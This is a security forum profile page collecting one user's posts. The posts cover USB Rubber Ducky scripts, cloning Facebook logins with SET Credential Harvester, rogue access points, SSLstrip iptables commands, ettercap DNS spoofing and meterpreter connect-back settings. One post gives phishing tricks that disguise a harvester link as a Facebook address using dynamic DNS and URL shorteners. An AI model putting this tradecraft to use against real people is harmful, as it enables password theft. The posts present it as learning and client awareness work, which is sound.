Jump to content

Ech3l0n

Active Members
  • Posts

    11
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Ech3l0n's Achievements

Newbie

Newbie (1/14)

  1. Thanks Apache, I will give the GUI d command a try. It's not the new driver bubble that is doing it. I put a 20 second delay in, everything loaded, then it opened the CMD prompt and it was not at the front for some reason. Tried it two more times after that, same thing. I was just messing with another script that didnt have an inital delay at the top and it did all kinds of crazy stuff, add a short delay and it opend the CMD prompt without issue. I am sure I will get the bugs worked out as I write my open scripts. Thanks again.
  2. Just got my ducky and have been testing a few of the scripts on git hub. One issue i have came across on a few scripts and a few different PC's is when the administrator prompt is called up via CONTROL-SHIFT ENTER it does not come to the front so the string that is to follow is not typed into the CMD window. Anyone else have this issue? It doesnt always happen, sometimes if I run the script again via the button, or unplugging and plugging back in it will work properly, other times it will never work. Some PC's it works every time. It is not a delay issue, simply clicking the mouse on the CMD window does the trick, of course it is useually through the string by that time. Any tips? Thanks
  3. When I use Credential Harvester on my internal LAN for example to clone facebook.com, once I enter in my username and password I get redirected to the real Facebook log-in page. When I use CH through NAT, everything works except the redirect. I end up getting a page that just shows an HTML tag meant to redirect me to the real log-in page. <html><head><meta HTTP-EQUIV="REFRESH" content="0; url=https://login.facebook.com/login.php"></head></html> Any idea how to fix this? I have gone through the set_config file and don't see anything in there that is set incorrectly. Any help would be great. Thanks, Ech3l0n UPDATE: It seems to be an issue with the way CH tries to redirect using Meta refresh. This doesn't seem to be working, but works in IE and via a LAN attack in Firefox, but not when NAT'ed. Any ideas?
  4. I have used airbase-ng, two adapters and bridging to setup a rough AP, all is working well. I am able to connect to my rogue AP with another pc, and it passes the traffic from my rough ap on mon0 to my eth1 interface seamlessly. I am able to sniff the traffic via the at0 interface created by airbase-ng. Next I was trying to setup SSLstrip between the two interfaces to grab passwords when I came across this problem. Turned on ipv4 forwarding: # echo 1 > /proc/sys/net/ipv4/ip_forward At this point the rogue ap is still working, my victim is still connected to the internet. Next I use IP tables to forward all port 80 traffic to SSL strips default listening port of 10000. # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 Now I start up SSLstrip. # python sslstrip.py -l 10000 -w sslpwords At this point my victim loses its internet connection. Actually just port 80 that was forwarded to SSLstrip, i can still SSH etc. So the issues seems to be that SSLstrip/IP tables is not forwarding on the data. Is it possible that it is an issue with having multiple interfaces up? This worked with a simple ARP spoof attack with a single interface, but maybe SSLstrip does not know to forward the data back out eth1? There are several scripts that do all of this automatically, but I would rather learn the attack from a less automated perspective prior to using a python script to do it all for me. I have combed through the scripts trying to figure out how they implement this attack but have not gotten far. Best I can tell is I need to do some additional work with IP tables to get the data that is send to SSLstrip back to the internet connected interface. Any help is appreciated. Ech3l0n
  5. Ech3l0n

    2wire

    Nice Job, if you think that is bad security, the old ones were the same way but with 64bit WEP....That took a whole 2 minutes to crack with aircrack back in the day. There was options to set it for WEP, 64 bit only, numbers only. You knew it was a 2wire by the SSID and just let her rip, I was in every 2wire on the block. Thanks for the info, I didn't realize the new ones were 10 digit WPA. Did you capture the handshake and then run your script against it, or just a strait brute force to the box? Ech3l0n
  6. I have one better for you, and thank you for pointing this out. I have used this many times, but of course the link then directs the victim PC to the actual address that then shows up in the browser bar as the IP. At this point they have not committed yet and may shy away from entering their credentials. So I added another step to this. Their are dozens of dynamic DNS sites out there that are free, just as an example, you could make facebook.picserver.org and point that to the IP address credential harvester is on, then tiny URL that as well, and now you have a nice one/two punch that will fool most people. I tried this out on some of my tech savvy friends and they all went for it, even knowing my devious side. I was nice and didn't do anything to them ;) As a reminder, in credential harvester, the connect back address should be entered as the DNS name and not the IP, this way when they click the tinyurl, bit.ly etc it will show up in the browser bar as the dynamic DNS name, rather than the IP. If you put the IP in credential harvester it still shows up as the IP. Another reminder, use port forwarding for example port 12345 points to 80 on your internal server with CH running on it. When making a tiny URL for this you have to enter the HTTP, so http://facebook.picserver.org:12345 = http://tinyurl.com/xyz If you leave credential harvester running on 80 facing the web it will get whacked by someone in hours if not minutes. I use this as a proof of concept when talking to my clients staff on the importance of not opening unfamiliar mail. I leave it running at home, SSH in with my Android and send someone a link, in the past I get burned because someone ran a tool against the open port 80 and brought down the listener. It really freaks out my clients employees to see that password pop up on my phone right in front of them, cuts down on virus infections because they are now scared to click on anything. Ech3l0n
  7. How do you set the LHOST and LPORT on the meterpreter payload that Fasttrack uses during its SQL exploits? As of now it assumes you are on the same LAN so the payload goes out with a "connect back to" address of 192.168.x.x. I need it to have my external IP and then utilize port forwarding. This is strait forward in MSF, but fasttrack does it all for you and I can't find a way to change this. Thanks for the help. Ech3l0n
  8. The extra 1 inch cable may just be a pull cord to help strip the outer coax sheath off, similar to what most Cat5 cables have. As stated above, it is directional, but that does not mean you will get your best signal pointing it directly at your target, the pattern of a yagi, especially a cheap one can be all over the place so move it around a bit. I don't know what your plans are for this, but you can build a hell of an wifi antenna out of an old sat dish and a soup can, I had built dozens before purchasing a nice 24db gain grid dish antenna. When it comes to antennas, like many other things, you get what you pay for. Ech3l0n
  9. Wow...you really thought that answer through LOL. Can't argue with that!
  10. Six or eight year ago a had a great little windows program that would watch the network for what I assume was DHCP requests or arp activity and then alert with a wav file or send an email if a MAC popped up that was not on the "approved" list. Looking for something similar, with email support. Can't find anything good. The only thing close I could find was WirelessNetView, but it has no email abilities, uses a scanner to check for new IP's making a shit load of noise, and when a new MAC does connect, and then disconnects it removes it from the list that I would have to check when I want to see who was on, completely useless! Interested in a windows program, Win7, as I want to run it on the host PC, and not gum up my VM's, but would be interested to know what is available for Linux if I can't find any options. Thanks, Ech3l0n
  11. First a quick hello as this is my first post on the forum, and a quick thanks for all the help I will be getting. Here is the setup. I setup a wireless LAN, one attacker with BT5r2 and one Win7 victim PC. I use SET Credential Harvester to setup duplicate webpage. If I type in the attack PC IP address into the victim browser everything works great, first log in attempt fails, forwards the credentials to the attack PC, then presents the victim PC with the real site in which I can then log in. To make the attack more convincing, I chose to use ettercap to do some dns spoofing. So I edit the etter.dns file to send the victim PC to the attack PC when they type in X site. Now the victim can browse to said site, get redirected to the fake Credential Harvester site, and the browser address bar shows the site they typed in rather than the attack PC's IP address, everything is good up to here. The problem. When Credential Harvester sends the victim PC to the real site after the first log in attempt, ettercap then again spoofs the site and sends that second request back to the attacker, and Credential Harvester has already shut down the fake site after getting the credentials, so to the victim PC it looks as if the site is down. So I have fixed the one problem of the browser bar not showing the legit site name, but in turn caused another by ettercap not allowing the victim PC to continue to the legit site. Is there any way around this? Maybe some type of scripting I can do with ettercap, or am I re-inventing the wheel and there is already a better way to do this? I know one way is to just use ettercap with SSLstrip, but I want to specifically get this targeted attack working. Thanks for your help, Ech3l0n
×
×
  • Create New...